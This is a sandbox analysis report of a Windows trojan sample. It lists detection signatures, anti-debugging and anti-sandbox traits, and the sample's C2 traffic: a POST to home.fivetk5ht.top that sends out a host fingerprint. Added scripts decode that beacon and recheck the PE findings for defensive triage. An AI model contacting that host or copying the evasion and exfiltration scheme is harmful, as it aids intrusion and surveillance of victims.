Windows Analysis Report
5ZH9uXmzGP.exe

Overview

General Information

Sample name: 5ZH9uXmzGP.exe (renamed because the original name is a hash value)
Original sample name: 35e2c99a2fed28f4148ef7f4c1431df4.exe
Analysis ID: 1578926
MD5: 35e2c99a2fed28f4148ef7f4c1431df4
SHA1: 8b05aa4709fd09892238baa7a14f42d58dd58d14
SHA256: d01a1b39c935e182b6e4d6c2c15dfe35a59b086fe55bbea0338bc35626a1d3df
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SLDT)
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

Label: mal100.troj.evad.winEXE@2/5@10/2 (malicious, score 100; trojan; evasive; Windows EXE)

Process Tree

  • System is w10x64
  • 5ZH9uXmzGP.exe (PID: 3148, cmdline: "C:\Users\user\Desktop\5ZH9uXmzGP.exe", MD5: 35E2C99A2FED28F4148EF7F4C1431DF4)
    • WerFault.exe (PID: 3176, cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112, MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: 5ZH9uXmzGP.exe | Avira: detected
Source: 5ZH9uXmzGP.exe | Virustotal: Detection: 52%
Source: 5ZH9uXmzGP.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 5ZH9uXmzGP.exe | Joe Sandbox ML: detected
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: 5ZH9uXmzGP.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Networking

Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 500630 (the same POST is listed three times in this group; the report truncates the body dump)
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Decoded, the dump is the start of a JSON host fingerprint: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name (cut off here)
Source: global traffic | HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */*
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: Joe Sandbox View | IP Address: 98.85.100.80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 events)
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknown | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 500630 | Data Raw: same request body as the POST listed above
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRE_
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851z
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
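The POST bodies in this group are shown only as a truncated hex dump. The script below is an added example, not part of the report or of the sample: it decodes a contiguous prefix of that dump (copied verbatim from the report) and extracts the host-fingerprint fields the sample exfiltrates, tolerating the truncation that makes a plain json.loads fail. The ANALYSIS_TOOLS set is taken from the tool names in the sample's own string table (see the Malware Analysis System Evasion section); matching the beacon's process list against it is an assumption about what the operator does with the data, not something the report shows. Treating the current_time field and the 1734579851 suffix of the URL path as Unix timestamps is an inference from their form.

```python
"""Decode the hex 'Data Raw' dump that Joe Sandbox prints for the sample's
POST to home.fivetk5ht.top and pull out the host fingerprint it carries.

Added example, not part of the report or of the sample. DATA_RAW is a
contiguous prefix of the Data Raw field exactly as printed in the report;
the report truncates the 500630-byte body, so the JSON is never complete and
the parser has to tolerate a cut-off document."""
import json
import re
from datetime import datetime, timezone

DATA_RAW = (
    "7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c "
    "20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 "
    "39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 "
    "34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 "
    "73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 "
    "22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 "
    "38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a "
    "20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 "
    "2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 "
    "22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f "
    "63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 "
    "79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 "
    "30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c "
    "20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 "
    "52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 "
    "7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 "
    "69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 "
    "73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c"
)

# Tool names the sample itself carries (the SYSINTERNALS...CREATETOOLHELP32SNAPSHOT
# string in the report). Assumption: the operator matches the beacon's process
# list against them server-side; the report does not show that step.
ANALYSIS_TOOLS = {"windbg.exe", "wireshark.exe", "procmon.exe", "x64dbg.exe", "ida.exe"}

_STRING = r'"(?:[^"\\]|\\.)*"'
_SCALAR = re.compile(r'"([A-Za-z_]+)":\s*(' + _STRING + r'|-?\d+(?:\.\d+)?)')
_PROCESS = re.compile(r'\{\s*"name":\s*(' + _STRING + r'),\s*"pid":\s*(\d+)\s*\}')
_DRIVE = re.compile(r'\{\s*"name":\s*(' + _STRING + r'),\s*"all":\s*([\d.]+),\s*"free":\s*([\d.]+)\s*\}')
_NESTED = {"name", "pid", "all", "free"}  # keys of the inner drive/process objects


def decode_data_raw(hex_dump):
    """Space-separated hex -> bytes; a dump cut mid-byte loses its last nibble."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", hex_dump)
    return bytes.fromhex(digits[:len(digits) - len(digits) % 2])


def parse_beacon(hex_dump):
    """Top-level fields plus the drive and process lists, from a possibly
    truncated body (json.loads rejects the cut-off text outright)."""
    text = decode_data_raw(hex_dump).decode("utf-8", errors="replace")
    beacon = {}
    for key, raw in _SCALAR.findall(text):
        if key in _NESTED:
            continue
        if raw.startswith('"'):
            beacon[key] = json.loads(raw)
        else:
            beacon[key] = float(raw) if "." in raw else int(raw)
    beacon["drivers"] = [(json.loads(n), float(a), float(f)) for n, a, f in _DRIVE.findall(text)]
    beacon["processes"] = [(json.loads(n), int(p)) for n, p in _PROCESS.findall(text)]
    beacon["truncated"] = not text.rstrip().endswith("}")
    return beacon


def epoch_to_iso(ts):
    """current_time and the URL path suffix look like Unix epochs; render them."""
    return datetime.fromtimestamp(int(ts), tz=timezone.utc).isoformat()


def flag_analysis_tools(beacon):
    """Process names in the beacon that match the sample's own tool list."""
    return sorted({name.lower() for name, _ in beacon["processes"]} & ANALYSIS_TOOLS)


if __name__ == "__main__":
    b = parse_beacon(DATA_RAW)
    print("public ip:", b["ip"], "reported at", epoch_to_iso(b["current_time"]))
    print("cpus:", b["Num_processor"], "ram:", b["Num_ram"], "displays:", b["Num_displays"],
          "resolution:", b["resolution_x"], "x", b["resolution_y"])
    print("drives:", b["drivers"], "recent files:", b["recent_files"])
    print("processes in dump:", len(b["processes"]), "(truncated)" if b["truncated"] else "")
    print("analysis tools seen:", flag_analysis_tools(b) or "none")
    print("URL path suffix 1734579851 as a timestamp:", epoch_to_iso(1734579851))
```

Run stand-alone it prints the fingerprint: the public IP (presumably what GET /ip on httpbin.org returned a moment earlier), CPU, RAM and display counts, the C: drive sizes, the recent-file count and the process list. current_time decodes to 2024-12-20T15:44:42Z and the path suffix to 2024-12-19T03:44:11Z, about 36 hours earlier; what the latter represents is not established by the report. The UPTIME_MINUTES and INSTALLED_APPS strings in the sample suggest the 500 KB body carries more than this prefix shows.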

System Summary

Source: 5ZH9uXmzGP.exe | Static PE information: section name: (special characters, not rendered)
Source: 5ZH9uXmzGP.exe | Static PE information: section name: .idata
Source: 5ZH9uXmzGP.exe | Static PE information: section name: (special characters, not rendered)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112
Source: 5ZH9uXmzGP.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 5ZH9uXmzGP.exe | Static PE information: Section: euhadjik ZLIB complexity 0.9942390467525196
Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3148
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0723bcbf-fabb-490d-8fde-6d665d2277da
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | File read: C:\Windows\System32\drivers\etc\hosts (5 times)
Source: 5ZH9uXmzGP.exe | Virustotal: Detection: 52%
Source: 5ZH9uXmzGP.exe | ReversingLabs: Detection: 50%
Source: 5ZH9uXmzGP.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown | Process created: C:\Users\user\Desktop\5ZH9uXmzGP.exe "C:\Users\user\Desktop\5ZH9uXmzGP.exe"
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: napinsp.dll (twice)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: pnrpnsp.dll (twice)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: wshbth.dll (twice)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: nlaapi.dll (twice)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: winrnr.dll (twice)
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Section loaded: windowscodecs.dll
Source: 5ZH9uXmzGP.exe | Static file information: File size 4485120 > 1048576
Source: 5ZH9uXmzGP.exe | Static PE information: Raw size of (section with special-character name) is bigger than: 0x100000 < 0x284c00
Source: 5ZH9uXmzGP.exe | Static PE information: Raw size of euhadjik is bigger than: 0x100000 < 0x1be800

Data Obfuscation

Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe | Unpacked PE file: 1.2.5ZH9uXmzGP.exe.140000.0.unpack | section rights in memory: (unprintable name):EW; .rsrc:W; .idata :W; (unprintable name):EW; euhadjik:EW; fyvcfwgt:EW; .taggant:EW | on disk: (unprintable name):ER; .rsrc:W; .idata :W; (unprintable name):EW; euhadjik:EW; fyvcfwgt:EW; .taggant:EW (the first section changed from ER to EW, which is the "changes PE section rights" hit)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 5ZH9uXmzGP.exe | Static PE information: checksum in header: 0x4569f0, should be: 0x4523d8
Source: 5ZH9uXmzGP.exe | Static PE information: section name: (special characters, not rendered)
Source: 5ZH9uXmzGP.exe | Static PE information: section name: .idata
Source: 5ZH9uXmzGP.exe | Static PE information: section name: (special characters, not rendered)
Source: 5ZH9uXmzGP.exe | Static PE information: section name: euhadjik
Source: 5ZH9uXmzGP.exe | Static PE information: section name: fyvcfwgt
Source: 5ZH9uXmzGP.exe | Static PE information: section name: .taggant
Source: 5ZH9uXmzGP.exe | Static PE information: section name: euhadjik entropy: 7.954343878891304
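Several of the static findings in this section (section names with special characters, non-standard names, the entry point in .taggant, the header checksum 0x4569f0 against a computed 0x4523d8, euhadjik at entropy 7.95) come from reading the PE section table and recomputing the checksum. The script below is an added example, not Joe Sandbox's code, and does that with nothing beyond the Python standard library. Because the sample itself is not on this page, build_sample_pe() constructs a synthetic PE32 whose section layout imitates the report's (an unprintable first name, .idata, a full-entropy euhadjik and .taggant holding the entry point) with the report's stored checksum value planted in the header; its sizes and contents are invented. The checksum routine is the imagehlp algorithm as pefile's generate_checksum implements it.

```python
"""Reproduce the report's static PE findings (section names with special
chars, non-standard names, entry point outside standard sections, invalid
checksum, section entropy) with a stand-alone parser. Added example, not Joe
Sandbox code; build_sample_pe() is a synthetic PE32 modelled on the report's
section layout, not the real sample."""
import math
import struct
from collections import Counter

STANDARD = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc", ".reloc", ".bss", ".tls"}
EXEC, READ, WRITE = 0x20000000, 0x40000000, 0x80000000


def _headers(data):
    """Return (optional header offset, section count, section table offset)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    return e_lfanew + 24, nsec, e_lfanew + 24 + opt_size


def sections(data):
    _, nsec, table = _headers(data)
    out = []
    for off in range(table, table + 40 * nsec, 40):
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, off)
        out.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                    "raw": data[rptr:rptr + rsize],
                    "chars": struct.unpack_from("<I", data, off + 36)[0]})
    return out


def is_plain(name):
    return all(0x20 < c < 0x7F for c in name)  # printable ASCII, no "special chars"


def entry_section(data):
    ep = struct.unpack_from("<I", data, _headers(data)[0] + 16)[0]
    for s in sections(data):
        if s["va"] <= ep < s["va"] + max(s["vsize"], len(s["raw"])):
            return s


def pe_checksum(data):
    """CheckSum as imagehlp computes it (pefile's generate_checksum is the same):
    ones-complement sum of 32-bit words skipping the field, folded, plus length."""
    skip = _headers(data)[0] + 64
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off != skip:
            total += struct.unpack_from("<I", padded, off)[0]
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)


def entropy(blob):
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values()) if n else 0.0


def triage(data):
    """One finding per hit, phrased like the report's signatures."""
    hits = []
    for s in sections(data):
        name = s["name"].decode() if is_plain(s["name"]) else repr(s["name"])
        if not is_plain(s["name"]):
            hits.append(f"section name contains special chars: {name}")
        elif name not in STANDARD:
            hits.append(f"non-standard section name: {name}")
        if entropy(s["raw"]) > 7.0:
            hits.append(f"section {name} entropy: {entropy(s['raw']):.2f}")
    ep = entry_section(data)
    if ep is None or ep["name"].decode("latin-1") not in STANDARD:
        hits.append("entry point lies outside standard sections")
    stored = struct.unpack_from("<I", data, _headers(data)[0] + 64)[0]
    if stored != pe_checksum(data):
        hits.append(f"invalid checksum: real 0x{stored:x} should be 0x{pe_checksum(data):x}")
    return hits


def _align(n, a):
    return -(-n // a) * a


def build_sample_pe(bogus_checksum=0x4569F0):
    """Synthetic PE32 (constructed, not the sample): unprintable first name,
    .idata, a full-entropy 'euhadjik' and '.taggant' holding the entry point."""
    falign, salign = 0x200, 0x1000
    layout = [(b"\x01\x02xy\xff", b"\0" * 0x200, READ | WRITE | EXEC | 0x20),
              (b".idata", b"I" * 0x200, READ | WRITE | 0x40),
              (b"euhadjik", bytes(range(256)) * 4, READ | WRITE | EXEC | 0x20),
              (b".taggant", b"\xC3" * 0x200, READ | EXEC | 0x20)]
    hdr_size = _align(0x40 + 24 + 224 + 40 * len(layout), falign)
    table, body, va, rptr, entry = b"", b"", salign, hdr_size, 0
    for name, content, chars in layout:
        rsize = _align(len(content), falign)
        table += struct.pack("<8sIIIIIIHHI", name, len(content), va, rsize, rptr, 0, 0, 0, 0, chars)
        body += content.ljust(rsize, b"\0")
        entry = va if name == b".taggant" else entry
        va, rptr = va + _align(len(content), salign), rptr + rsize
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(layout), 0, 0, 0, 224, 0x030E)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, 0, 0, 0, entry, 0x1000, 0x2000, 0x400000, salign, falign,
                      6, 0, 0, 0, 6, 0, 0, va, hdr_size, bogus_checksum, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    return (dos + coff + opt + table).ljust(hdr_size, b"\0") + body
```

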